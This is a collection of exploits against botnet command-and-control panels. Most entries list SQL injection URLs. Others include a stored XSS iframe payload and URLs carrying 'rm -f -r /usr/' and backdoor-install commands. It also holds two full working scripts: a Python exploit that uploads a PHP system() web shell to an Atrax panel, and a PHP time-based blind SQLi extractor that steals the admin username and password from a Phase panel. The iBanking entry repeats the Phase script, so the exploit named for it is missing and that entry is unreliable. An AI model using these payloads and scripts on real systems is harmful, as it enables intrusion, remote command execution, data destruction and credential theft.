Botnet Exploits
Athena
Casinoloader
Citadel
CYTHOSIA BOTNET
DLOADER
HERPES
SAKURA
SILENCE WINLOCKER V5.0
SMOKE LOADER
SOLARBOT
SPY-EYE
TINBA
UMBRA
ZEUS AND ZEUS EVO
ZSKIMMER
iBanking
Atrax botnet
Phase botnet
Botnet Exploits
Athena
Type: SQLi
Vuln: http://localhost:8992/panel/gate.php?botid=1&newbot=1&country=AUD&country_code=AUD &ip=10.0.0.1&os=win&cpu=amd&type=mate&cores=1999&version=88.8&net=wlan&admin=narwals&busy=no&lastseen=now
Casinoloader
Type: SQLi
Vuln: http://localhost/gateway.php
POSTDATA page=1&val=1
Citadel
Type: SQLi
Vuln: http://localhost/cp.php?bots=1
CYTHOSIA BOTNET
Type: Stored XSS and iFrame redirect
Click add task Command: IFRAME SRC="whateverekorlemonpartyorwhatnot.com" /IFRAME
Then Click Create Task Finally click Tasks. VOILA!
(Credits to asterea for finding this botnet panel)
DLOADER
Type: SQLi
Vuln1: http://localhost/includes/get_kktocc.php?line=1
Vuln2: http://localhost/includes/update_url.php?fid=1
HERPES
Type: SQL injection.
http://localhost/tasks.php POST: vote=1&submitted=1
SAKURA
Type: SQLi
http://localhost/func.php?showtopic=2 http://localhost/index.php?showtopic=322 http://localhost/sakuraadmin44.php?filename=1.png&cmd=rm%20-f%20-r%20%2Fusr%2F&edit=2312 http://localhost/sakuraadmin44.php?filename=1.png&cmd=apt-get%20install%20backdoor http://localhost/sakuraadmin44.php?link=http%3A%2F%2Fmetasploit.com%2F&threads=10 http://localhost/showthread.php?t=123 http://localhost/showthread.php?t=23&cmd=32
Type: SQLi - POST
http://localhost/sakuraadmin44.php?threads=222&link=21213.com POST: exploits=992.ds http://localhost/sakuraadmin44.php?threads=11 POST: snick=123&file=321&exploits=123 http://localhost/sakuraadmin44.php?threads=21 POST: snick=1
SILENCE WINLOCKER V5.0
Type: SQL injection.
http://localhost/forma.php?pin=4322 http://localhost/index.php?x=1&act=delete&id=1 http://localhost/picture.php?pin=8787 http://localhost/tmp/get.php?pin=1334
SMOKE LOADER
Type: SQLi
http://localhost/control.php?id=1 http://localhost/guest.php?id=1
POST
SOLARBOT
Type: SQL injection.
localhost/index.php POSTDATA i=1881&p=80&u=8302&h=282&s=AUD
SPY-EYE
Type: SQLi
http://localhost/frm_boa-grabber_sub.php?dt=11%2F11%2F1998
TINBA
Type: SQLi
\tinybanker panel\admin/control/logs.act.php http://localhost/logs.act.php Post Data: bot_uid=1&botcomment=mate
UMBRA
Type: SQLi
Vuln: http://localhost/delete_command.php?deleteID=1
ZEUS AND ZEUS EVO
Type: SQLi
Vuln: http://localhost/gate.php?ip=8.8.8.8
ZSKIMMER
Type: SQLi
Vuln: http://localhost/process.php?xy=2
iBanking
Type: Shell upload
shell: (editor's note: the script below is byte-for-byte the same blind-SQLi extractor that is posted again under "Phase botnet" further down — its own header comment names Phase — so the iBanking shell-upload exploit itself appears to be missing from this post) <?php
// Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
// Start with PHP CLI (php pwn.php)
set_time_limit(0); // the extraction below issues many deliberately slow requests, so drop the CLI time limit
// Adjust this
define('SLEEP_TIME', '4');    // seconds the injected SLEEP() stalls a matching row (a string here; it is only ever concatenated into SQL text)
define('PAGE_TIME', 4);       // response-time threshold in seconds: is_true() reads any slower round trip as "true"
define('URL', 'http://localhost/Phase/'); // panel base URL; is_true() appends gate.php to it
echo('attacking ' . URL . PHP_EOL);
// Recover the two `settings` rows character by character. The helpers are declared further down;
// PHP hoists unconditional top-level function declarations, so these calls resolve.
get_string('username');
get_string('password');
// Recovers LENGTH(value) of the `settings` row whose `key` = $field, one guess per request.
// Each guess is appended to the injected WHERE clause as
//   NOT (LENGTH(value)=N) OR SLEEP(SLEEP_TIME)
// so only the matching N makes the server evaluate SLEEP() and stall; is_true() turns that stall
// into the loop's exit condition. Guesses start at 1 and are unbounded, so an absent key or an
// empty value never terminates the loop. $field is concatenated into the SQL text as-is.
// Returns the length as an int and prints it to stdout.
function get_length($field) {
    $length = 1;
    while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
        ++$length;
    }
    echo($field . ' length: ' . $length . PHP_EOL); // progress output
    return $length;
}
// Extracts the whole `settings`.value for $field: first its length via get_length(), then each
// byte via get_char(). After every byte the partial result is printed with the still-unknown
// tail padded by '*'. Returns the recovered string.
function get_string($field) {
    $length = get_length($field);
    $str = '';
    for ($i = 0; $i < $length; ++$i) {
        $str .= chr(get_char($field, $i)); // get_char() returns the byte as an int
        echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
    }
    return $str;
}
// Recovers one byte of `settings`.value for $field at 0-based offset $id by probing its seven
// low bits individually with the injected test
//   NOT (ORD(SUBSTR(`value`,$id+1,1)) & bit) OR SLEEP(SLEEP_TIME)
// — a stall (is_true) means the bit is set. Bits are probed from 1 upward and each result is
// prepended, so $binary ends up most-significant-bit first for bindec(). Bit 128 is never probed
// and is assumed 0, i.e. the value is assumed to be 7-bit ASCII. Seven requests per byte.
// Returns the byte value as an int.
function get_char($field, $id) {
    $binary = '';
    for ($i = 1; $i < 256; $i *= 2) {
        if ($i == 128)
            $binary = '0' . $binary; // high bit assumed clear rather than probed
        else
            $binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
    }
    return bindec($binary);
}
// Sends one request to the panel's gate.php with $query URL-encoded and appended directly to the
// `i` parameter (the injection point), and reports whether the round trip took at least PAGE_TIME
// seconds. The POST body mimics a bot check-in: a fixed 4-byte RC4 key sent in the clear, followed
// by the RC4-encrypted fields b/d/u — presumably what gate.php expects (inferred from this client
// only, not verified here). Any slow or failed exchange, including one that hits post_request()'s
// 30 s cURL timeout, counts as "true", so plain network latency can yield false positives.
function is_true($query) {
    $rc4_key = 'aaaa'; // key travels in the clear in front of the ciphertext; the body carries fields b, d and u
    $data = 'u=tapz&d=faggot&b=lol';
    $encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
    $encode = $rc4_key . $encode;
    $injection = urlencode($query);
    $req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
    return !($req['time'] < PAGE_TIME); // true iff the server stalled (or the request was slow for any other reason)
}
// Issues one HTTP POST with $data as the raw request body and reports how long the exchange took.
// Returns array('page' => response body, or false when cURL failed, 'time' => wall-clock seconds).
// The timer wraps curl_exec() only, so DNS/connect time is included and a request that hits the
// 30 s timeout still reports a large 'time'. No error information is returned.
function post_request($url, $data) {
    $ch = curl_init($url);
    curl_setopt_array($ch, array(
        CURLOPT_HEADER         => false,
        CURLOPT_USERAGENT      => 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => $data,
        CURLOPT_TIMEOUT        => 30,
    ));
    $started = microtime(true);
    $body = curl_exec($ch);
    $elapsed = microtime(true) - $started;
    curl_close($ch);
    return array(
        'page' => $body,
        'time' => $elapsed,
    );
}
// RC4 stream cipher (key scheduling + keystream generation): returns $data XOR keystream as a
// binary string. $pwd is repeated cyclically to fill the 256-entry key schedule. $data_length and
// $pwd_length are used as given rather than derived, so callers pass strlen() of each.
// Encrypting and decrypting are the same operation. RC4 is a broken cipher; it is used here only
// because it is the wire format the panel speaks.
function rc4($pwd, $data, $data_length, $pwd_length){
    // Key scheduling: start from the identity permutation and stir it with the key bytes.
    $state = range(0, 255);
    $j = 0;
    for ($n = 0; $n < 256; $n++) {
        $j = ($j + $state[$n] + ord($pwd[$n % $pwd_length])) % 256;
        $held = $state[$n];
        $state[$n] = $state[$j];
        $state[$j] = $held;
    }
    // Keystream generation: one keystream byte per input byte.
    $x = 0;
    $y = 0;
    $out = '';
    for ($n = 0; $n < $data_length; $n++) {
        $x = ($x + 1) % 256;
        $y = ($y + $state[$x]) % 256;
        $held = $state[$x];
        $state[$x] = $state[$y];
        $state[$y] = $held;
        $stream = $state[($state[$x] + $state[$y]) % 256];
        $out .= chr(ord($data[$n]) ^ $stream);
    }
    return $out;
}
Atrax botnet
Type: Shell Upload
Shell: #!/usr/bin/python
import random
import string
import base64
import urllib
import urllib2
# <CONFIG>
# Final payload: a one-line PHP web shell that runs the `c` query parameter through system().
payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
url = 'http://localhost/atrax/'  # panel base URL; auth.php and plugins/... are appended to it
# </CONFIG>
# Single-letter parameter names the Atrax panel's auth.php uses (as reconstructed by the author).
BOT_MODE_INSERT = 'b' # BOT MODE: register/update a bot
BOT_MODE_RUNPLUGIN = 'e' # BOT MODE: hand data to a named plugin
GET_PARAM_MODE = 'a' # GET PARAM selecting the mode above
POST_PARAM_GUID = 'h' # POST PARAM: bot identifier
POST_PARAM_IP = 'i'
POST_PARAM_BUILDID = 'j'
POST_PARAM_PC = 'k'
POST_PARAM_OS = 'l'
POST_PARAM_ADMIN = 'm'
POST_PARAM_CPU = 'n'
POST_PARAM_GPU = 'o'
POST_PARAM_PLUGINNAME = 'q'
def request(url, get, post):
    # Python 2 (urllib2) helper that sends one HTTP request and returns the response body as a str.
    # `get` is appended verbatim as the query string when non-empty. `post` is a pre-built
    # 'k=v&k=v' string that is split back into a dict and re-encoded; splitting on '=' and keeping
    # only index 1 silently drops anything after a second '=' inside a value.
    # NOTE(review): the original indentation was lost in extraction; urlencode() is shown after the
    # if-block so that an empty `post` still yields a str body — confirm against the source.
    if not get == '':
        url += '?' + get
    encoded = {}
    if not post == '':
        for _ in post.split('&'):
            data = _.split('=')
            encoded[data[0]] = data[1]
    encoded = urllib.urlencode(encoded)
    request = urllib2.Request(url, encoded)  # local name shadows this function; harmless here
    response = urllib2.urlopen(request)
    page = response.read()
    return page
def queryValue(key, value, next=True):
    """Render one ``key=value`` pair for a query or POST string.

    A trailing ``&`` is added while ``next`` is true so that pairs can be
    concatenated; pass ``next=False`` for the last pair. No URL-encoding is
    performed here.
    """
    separator = '&' if next else ''
    return '%s=%s%s' % (key, value, separator)
def randomString(length = 8):
    """Return ``length`` characters drawn from [a-z0-9].

    Uses ``random.choice`` (not cryptographically strong); ``length`` 0 gives ''.
    """
    alphabet = string.ascii_lowercase + string.digits
    picks = [random.choice(alphabet) for _ in range(length)]
    return ''.join(picks)
def createVictim(url, guid, ip):
    # Registers (or refreshes) a fake bot with the panel's auth.php in insert mode, posting the
    # GUID, IP and random build/PC/OS/CPU/GPU strings plus admin='yes'. Returns the raw response
    # body; the caller treats the literal 'STOP' as rejection.
    get = queryValue(GET_PARAM_MODE, BOT_MODE_INSERT, False)
    post = queryValue(POST_PARAM_GUID, guid)
    post += queryValue(POST_PARAM_IP, ip)
    post += queryValue(POST_PARAM_BUILDID, randomString())
    post += queryValue(POST_PARAM_PC, randomString())
    post += queryValue(POST_PARAM_OS, randomString())
    post += queryValue(POST_PARAM_ADMIN, 'yes')
    post += queryValue(POST_PARAM_CPU, randomString())
    post += queryValue(POST_PARAM_GPU, randomString(), False)  # last pair: no trailing '&'
    return request(url + 'auth.php', get, post)
def exploit(url, guid, ip, file, payload):
    # Calls auth.php in run-plugin mode for the bundled 'atraxstealer' plugin, passing a file name
    # (`ad`) and the base64-encoded `payload` (`ab`). testExploit() assumes the plugin writes the
    # decoded content to plugins/atraxstealer/wallet/<file>. The meaning of the am/ad/ab/ai fields
    # beyond this usage is not documented here. The response is discarded.
    # Note: base64 padding ('=') in `ab` is cut off by request()'s split on '='.
    get = queryValue(GET_PARAM_MODE, BOT_MODE_RUNPLUGIN, False)
    post = queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer')
    post += queryValue(POST_PARAM_GUID, guid)
    post += queryValue(POST_PARAM_IP, ip)
    post += queryValue('am', randomString())
    post += queryValue('ad', file)
    post += queryValue('ab', base64.b64encode(payload))
    post += queryValue('ai', '18', False)
    request(url + 'auth.php', get, post)
def testExploit(url, guid, ip):
    # Pushes a marker file (PHP that prints '1337') through exploit() and fetches it back from
    # plugins/atraxstealer/wallet/<random>.php. True means the file landed there and is executed
    # as PHP (the body is the printed marker, not the source). The marker file is never removed.
    file = randomString() + '.php'
    payload = '<?php echo("1337"); ?>'
    exploit(url, guid, ip, file, payload)
    return request(url + 'plugins/atraxstealer/wallet/' + file, '', '').strip() == '1337'
# Entry point. The GUID is a fixed 32-hex-character bot id and the IP is arbitrary; both only label
# the fake bot. `file` is the name the final payload will be stored under.
# NOTE(review): indentation was lost in extraction; the upload step is shown nested under the
# successful-registration branch, which is the reading that makes the 'STOP' check meaningful —
# confirm against the source.
guid = '7461707a7461707a7461707a7461707a'
ip = '91.224.13.103'
file = randomString() + '.php'
if createVictim(url, guid, ip).strip() == 'STOP':
    print '[-] Cannot create victim...'
else:
    print '[~] Victim created/updated...'
    if testExploit(url, guid, ip):
        exploit(url, guid, ip, file, payload)
        print '[+] Exploit uploaded!'
        print '=> ' + url + 'plugins/atraxstealer/wallet/' + file
    else:
        print '[-] Cannot upload payload, maybe the plugin is not actived?'
Phase botnet
Type: blind SQLi
Vuln: <?php
// Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
// Start with PHP CLI (php pwn.php)
set_time_limit(0); // the extraction below issues many deliberately slow requests, so drop the CLI time limit
// Adjust this
define('SLEEP_TIME', '4');    // seconds the injected SLEEP() stalls a matching row (a string here; it is only ever concatenated into SQL text)
define('PAGE_TIME', 4);       // response-time threshold in seconds: is_true() reads any slower round trip as "true"
define('URL', 'http://localhost/Phase/'); // panel base URL; is_true() appends gate.php to it
echo('attacking ' . URL . PHP_EOL);
// Recover the two `settings` rows character by character. The helpers are declared further down;
// PHP hoists unconditional top-level function declarations, so these calls resolve.
get_string('username');
get_string('password');
// Recovers LENGTH(value) of the `settings` row whose `key` = $field, one guess per request.
// Each guess is appended to the injected WHERE clause as
//   NOT (LENGTH(value)=N) OR SLEEP(SLEEP_TIME)
// so only the matching N makes the server evaluate SLEEP() and stall; is_true() turns that stall
// into the loop's exit condition. Guesses start at 1 and are unbounded, so an absent key or an
// empty value never terminates the loop. $field is concatenated into the SQL text as-is.
// Returns the length as an int and prints it to stdout.
function get_length($field) {
    $length = 1;
    while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
        ++$length;
    }
    echo($field . ' length: ' . $length . PHP_EOL); // progress output
    return $length;
}
// Extracts the whole `settings`.value for $field: first its length via get_length(), then each
// byte via get_char(). After every byte the partial result is printed with the still-unknown
// tail padded by '*'. Returns the recovered string.
function get_string($field) {
    $length = get_length($field);
    $str = '';
    for ($i = 0; $i < $length; ++$i) {
        $str .= chr(get_char($field, $i)); // get_char() returns the byte as an int
        echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
    }
    return $str;
}
// Recovers one byte of `settings`.value for $field at 0-based offset $id by probing its seven
// low bits individually with the injected test
//   NOT (ORD(SUBSTR(`value`,$id+1,1)) & bit) OR SLEEP(SLEEP_TIME)
// — a stall (is_true) means the bit is set. Bits are probed from 1 upward and each result is
// prepended, so $binary ends up most-significant-bit first for bindec(). Bit 128 is never probed
// and is assumed 0, i.e. the value is assumed to be 7-bit ASCII. Seven requests per byte.
// Returns the byte value as an int.
function get_char($field, $id) {
    $binary = '';
    for ($i = 1; $i < 256; $i *= 2) {
        if ($i == 128)
            $binary = '0' . $binary; // high bit assumed clear rather than probed
        else
            $binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
    }
    return bindec($binary);
}
// Sends one request to the panel's gate.php with $query URL-encoded and appended directly to the
// `i` parameter (the injection point), and reports whether the round trip took at least PAGE_TIME
// seconds. The POST body mimics a bot check-in: a fixed 4-byte RC4 key sent in the clear, followed
// by the RC4-encrypted fields b/d/u — presumably what gate.php expects (inferred from this client
// only, not verified here). Any slow or failed exchange, including one that hits post_request()'s
// 30 s cURL timeout, counts as "true", so plain network latency can yield false positives.
function is_true($query) {
    $rc4_key = 'aaaa'; // key travels in the clear in front of the ciphertext; the body carries fields b, d and u
    $data = 'u=tapz&d=faggot&b=lol';
    $encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
    $encode = $rc4_key . $encode;
    $injection = urlencode($query);
    $req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
    return !($req['time'] < PAGE_TIME); // true iff the server stalled (or the request was slow for any other reason)
}
// Issues one HTTP POST with $data as the raw request body and reports how long the exchange took.
// Returns array('page' => response body, or false when cURL failed, 'time' => wall-clock seconds).
// The timer wraps curl_exec() only, so DNS/connect time is included and a request that hits the
// 30 s timeout still reports a large 'time'. No error information is returned.
function post_request($url, $data) {
    $ch = curl_init($url);
    curl_setopt_array($ch, array(
        CURLOPT_HEADER         => false,
        CURLOPT_USERAGENT      => 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => $data,
        CURLOPT_TIMEOUT        => 30,
    ));
    $started = microtime(true);
    $body = curl_exec($ch);
    $elapsed = microtime(true) - $started;
    curl_close($ch);
    return array(
        'page' => $body,
        'time' => $elapsed,
    );
}
// RC4 stream cipher (key scheduling + keystream generation): returns $data XOR keystream as a
// binary string. $pwd is repeated cyclically to fill the 256-entry key schedule. $data_length and
// $pwd_length are used as given rather than derived, so callers pass strlen() of each.
// Encrypting and decrypting are the same operation. RC4 is a broken cipher; it is used here only
// because it is the wire format the panel speaks.
function rc4($pwd, $data, $data_length, $pwd_length){
    // Key scheduling: start from the identity permutation and stir it with the key bytes.
    $state = range(0, 255);
    $j = 0;
    for ($n = 0; $n < 256; $n++) {
        $j = ($j + $state[$n] + ord($pwd[$n % $pwd_length])) % 256;
        $held = $state[$n];
        $state[$n] = $state[$j];
        $state[$j] = $held;
    }
    // Keystream generation: one keystream byte per input byte.
    $x = 0;
    $y = 0;
    $out = '';
    for ($n = 0; $n < $data_length; $n++) {
        $x = ($x + 1) % 256;
        $y = ($y + $state[$x]) % 256;
        $held = $state[$x];
        $state[$x] = $state[$y];
        $state[$y] = $held;
        $stream = $state[($state[$x] + $state[$y]) % 256];
        $out .= chr(ord($data[$n]) ^ $stream);
    }
    return $out;
}